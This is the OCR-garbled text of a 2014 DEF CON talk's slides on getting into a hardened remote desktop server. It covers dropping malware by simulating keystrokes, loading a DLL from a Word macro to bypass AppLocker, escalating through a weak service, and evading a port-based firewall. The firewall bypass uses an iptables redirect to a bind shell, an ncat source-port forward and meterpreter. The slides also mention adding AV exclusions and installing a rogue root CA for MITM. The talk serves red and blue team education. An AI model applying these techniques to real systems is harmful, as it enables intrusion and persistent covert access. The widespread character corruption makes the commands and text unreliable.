Bypass irewalls, application

white lists, secure remote

desktops in 20 seconds
Zoltan Balazs
DLl CON 22, 2014
rootkali:~4 whoami
Zoltan Balazs
rootkali:~4 whoami
rootkali:~4 whoami
AV testing
AV bypass
rootkali:~4 whoami
OSCP: Occasional Satire Captain Punk
CISSP: Certiied Interspecie-ial Sheep Shearing Proessional
CP1S: Certiied Pajama 1oaster Specialist
MCP: Microsot Certiied Psychopath
OS\P: Oicial Sexiest \easel Popstar
CllI: Chronic lopeless llux Incompetent
Im NO1 a CLl
CyberLympics2012 C1l
2nd runners up gula.sh
Creator o the Zombie Browser 1oolkit
https:,,github.com,Z6543,ZombieBrowserPack
lungary
I loe hacking
low do you hack high security
systems
low do you hack high security
systems when you are not 1om Cruise
1he mission
Im a spy ,with low budget,
I want access to a hardened secure RDP ,remote
desktop, serer
L.g. serer contains conidential documents
I need persistent C&C access to the RDP serer
1o upload,download iles
Interactie remote code execution
1he solution ,in an ideal world,
Infected
workstation
Secure remote
desktop server
1. Infect clients
desktop
2. Steal RDP password
3. Connect to RDP
4. Drop malware
5. Command and Control
6. Proit
1he challenges
RDP serer is not reachable rom the Internet
Directly
1wo actor authentication is used to access the RDP serer
No access to the token seeds ,,
Drie mapping disabled no direct ile copy
Restrictie hardware irewall
Allows workstation - serer 1CP port 3389 IP4 only
Application white list is used on the RDP serer
M> Applocker in my case with deault policy
Firewall, port 3389 allowed only
Is this realistic
Similar enironment at a client
lad no time to hack it
Infected
workstation
Secure remote
desktop server
Target
Company
The Internet
Attacker
Firewall, port 3389 allowed only
In hacking, there is no such thing
as impossible.
Only things that are more
challenging.
Already achieed
I have remote code execution with C&C on a users
workstation
I hae access to a test RDP serer
I know how the iles on the serer look like, what serices
are installed
1his is Spartaaaa post-exploitation
\hy should you care about this
!"# %"&'()"*%"+%",
New tools
-./" %"&'
New things to look or during log
analysis,incident response
01.234 '&5",(6/+2*"++
lunny pictures
Diide et impera!
Diide the problem into smaller pieces and rule them
all, one by one
1. drop malware into the RDP serer
2. execute any code on RDP serer
3. eleate to admin priileges
4. bypass hardware irewall
Diide et impera!
Diide the problem into smaller pieces and rule them
all, one by one
78 #,1) '&.9&," 2*%1 %:" !;0 +",<", = *"9 +:2*4 %11.
2. execute any code on RDP serer nothing new here
3. eleate to admin priileges nothing new, no 0day or
you
>8 64)&++ :&,#9&," ?2,"9&.. @= *"9 +:2*4 %11.
1. Drop malware into RDP serer
1. Drop malware into RDP serer
Malware waits or the user to connect to RDP serer
Creates screenshot ,or new animation,, show in oreground
Optionally blocks user keyboard, mouse ~20 seconds
Uses the keyboard and the clipboard simulates user
1. Starts M> \ord on RDP serer
2. Drops encoded ASCII payload
3. Creates Macro code
4. Macro writes binary
5. Macro starts binaries
Alternative usage of user
simulator
1. Add directory to be excluded rom AV scans
use the AV GUI!
only i the user has the priileges and no UAC
2. Install new trusted root certiication authority and
accept warning and Mi1M SSL connections
CA pinning does not stop
this attack
1he AV is alie.
Nope, Chuck 1esta
2. \hat is Applocker
2. Lxecute any code, bypass
Applocker
AppLocker can only control VBScript, JScript, .bat
iles, .cmd iles and \indows PowerShell scripts. It
does not control all interpreted code that runs within a
host process, or example Perl scripts and macros.
Applications could contain lags that are passed to
unctions that signal AppLocker to circument the rules
and allow another .exe or .dll ile to be loaded.
1he administrator on the local computer can modiy
the AppLocker policies deined in the local GPO.
Lxecute any code, bypass
Applocker
Load DLL with \ord Macro!
Len shellcode execution is possible!
http:,,blog.didiersteens.com,2008,06,05,bpmtk-
how-about-srp-whitelists,
Priate Declare PtrSae lunction LoadLibrary Lib "kernel32"
Alias "LoadLibraryA" ,ByVal lpLiblileName As String, As Long
hLibrary ~ LoadLibrary,outputdir - "`hack_serice.dll",
3. Lleate to admin
3. Lleate to admin
\hy do I need admin
It is needed or the last phase, hardware irewall bypass
Possibilities
Local pri esc zero day or \in 2012
Lxploit unpatched ulnerability
Lxploit ulnerable 3
rd
party program serice
Ltc.
Processes started with admin ,or higher, priileges are
not restricted by AppLocker!
Lleate to admin - Serice exploit
C:` accesschk.exe l mulnserice.exe
|0| ACCLSS_ALLO\LD_ACL_1\PL: N1 AU1lORI1\`1LRMINAL SLRVLR USLR
lILL_APPLND_DA1A
lILL_LXLCU1L
lILL_RLAD_A11RIBU1LS
lILL_RLAD_DA1A
lILL_RLAD_LA
lILL_\RI1L_A11RIBU1LS
lILL_\RI1L_DA1A
lILL_\RI1L_LA
S\NClRONIZL
RLAD_CON1ROLs
C:` sc sdshow myulnserice
D:,A,,CCLCS\RP\PD1LOCRRC,,,S\,
,A,,CCDCLCS\RP\PD1LOCRSDRC\D\O,,,BA,,A,,CCLCS\LOCRRCRP\P,,,IU,,A,,CCLCS\LOCRRC,,,SU,
Lleate to admin - Serice exploit
C:` accesschk.exe l mulnserice.exe
|0| ACCLSS_ALLO\LD_ACL_1\PL: N1 AU1lORI1\`1LRMINAL SLRVLR USLR
lILL_APPLND_DA1A
lILL_LXLCU1L
lILL_RLAD_A11RIBU1LS
lILL_RLAD_DA1A
lILL_RLAD_LA
lILL_\RI1L_A11RIBU1LS
lILL_\RI1L_DA1A
lILL_\RI1L_LA
S\NClRONIZL
RLAD_CON1ROLs
C:` sc sdshow myulnserice
D:,A,,CCLCS\RP\PD1LOCRRC,,,S\,
,A,,CCDCLCS\RP\PD1LOCRSDRC\D\O,,,BA,,A,,CCLCS\LOCRRCRP\P,,,IU,,A,,CCLCS\LOCRRC,,,SU,
Allow
Serice start
Serice stop
Interactiely
logged on
user
Quiz
Quiz
Whats the name of the company which published the
irst paper about packet ilter irewalls
in 1988
Quiz
Whats the name of the company which published the
irst paper about packet ilter irewalls
in 1988
1he company deeloped VAX
Quiz
Whats the name of the company which published the
irst paper about packet ilter irewalls
in 1988
;igital
Aquipment
Borporation
4. Bypass hardware irewall
Restrictie irewall
No Bind shell
No Reerse shell
No coert channel
DNS, ICMP, IP6, UDP, proxy
No shell!!!
In a dierent scenario
1CP socket reuse shell possible ,not persistent,
\ebshell ,lame, possible
But not in this case ,no exploit, no webserer,
4. Bypass hardware irewall
lirst ,bad, idea
Ater malware dropped,
mark eery packet to be special
start with magic bytes
and let a kernel network ilter drier select the packets
Problem
Lery ,hacker, application has to be rewritten, or rerouted
through a custom wrapper proxy ,both serer and client
side,
Bypass l\ irewall second idea
Use 1CP source port!
L.g. port 133 is always special
Limitations
NA1 rom the attacker side
But who cares
Bypassing hardware irewalls
Linux
Use code at Kernel leel ,with root,
i ,,tcp_source_port ~~~ 133, && ,tcp_dest_port
~~~ 22,, then:
redirect to bind shell on port 3133
iptables -t nat -A PRLROU1ING -p tcp --dport 22 --
sport 133 -j RLDIRLC1 --to-ports 3133
Attacker or
infected
workstation
Firewall, port 3389 allowed only Secure remote
desktop server
Src port
1337
Dst port
3389
Dst port
3389
Dst port
31337
Bypassing hardware irewalls on
\indows x64
Installing a kernel drier in \indows x64 is not triial
1rusted signed drier is needed
1hanks to basil or \inDiert project ,and Nemea Sotware
Deelopment,
1rusted signed kernel drier already included!
\ou can interace with the kernel drier
Alternatiely, patchguard bypass could be used
http:,,www.codeproject.com,Articles,28318,Bypassing-
PatchGuard
Uroburos rootkit Bring \our Own Vuln
Install root CA irst with user simulator ,,
low to set 1CP source port or
meterpreter bind shell ,or any
program,
Netcat ,Nmap build, to da rescue!
ncat -kl 4444 -c
"ncat -p 133 RDP.SLR.VLR.IP 3389"
Demo
Alternative usage of hw w
bypass
\ou hae admin on webserer
but persistent outbound C&C is blocked
Instead o local port orward, use netcat to port
orward to other machines in the DMZ
Backdoor traic to hide your
communication inside the
legit network traic
1he solution as a whole
Malware waits or the user to login to RDP with 2lA
Create screenshot rom user desktop
Put screenshot on the screen
Disable keyboard,mouse
Drop malware by simulating user keyboard eents -
clipboard or large ,ASCII, data transer
Start \ORD, create new macro code
Bypass application whitelist using DLL loading rom
\ord macro code
1he solution
Lscalate priileges to admin ,ulnerable serice,
Install hwwbypass.exe with kernel drier
Drop meterpreter
Proit!
Demo
Demo 2 as seen by the user
Lessons learned or red team
\ou hae two new tools or your post exploitation
tool to drop malware into the remote desktop
I you hae admin on a \indows serer, you can
bypass,ool hardware irewalls using my drier
Lessons learned or the blue team
Lery additional layer o security can still be bypassed
Restricted remote desktop is a real interace or
malware inection
Use application,protocol aware ,NG, irewall instead
o port based ones
Can be bypassed ,,
Dont trust your firewall logs
blindly
Code release now
Reerences
http:,,reqrypt.org,windiert.html
http:,,inputsimulator.codeplex.com, - modiied
http:,,www.blackhat.com,presentations,bh-usa-06,Bl-
US-06-1ereshkin.pd
http:,,blog.didiersteens.com,2011,01,24,circumenting-
srp-and-applocker-by-design,
http:,,www.room362.com,blog,2014,01,16,application-
whitelist-bypass-using-ieexec-dot-exe
http:,,leastpriilege.blogspot.r,2013,04,bypass-
applocker-by-loading-dlls-rom.htmlm~1
https:,,www.mandiant.com,blog,hikit-rootkit-adanced-
persistent-attack-techniques-part-2,
one more thing
two more things
User simulator aailable as Metasploit post module
l\ l\ bypass aailable as Metasploit post module
lack 1he Planet!
https:,,github.com,MRGLitas,\rite-into-screen
https:,,github.com,MRGLitas,hwwbypass
zoltan.balazsmrg-eitas.com
https:,,hu.linkedin.com,in,zbalazs
1witter zh4ck
www.slideshare.net,bz98
Greetz to hekkcamp
JumpLSPJump.blogspot.com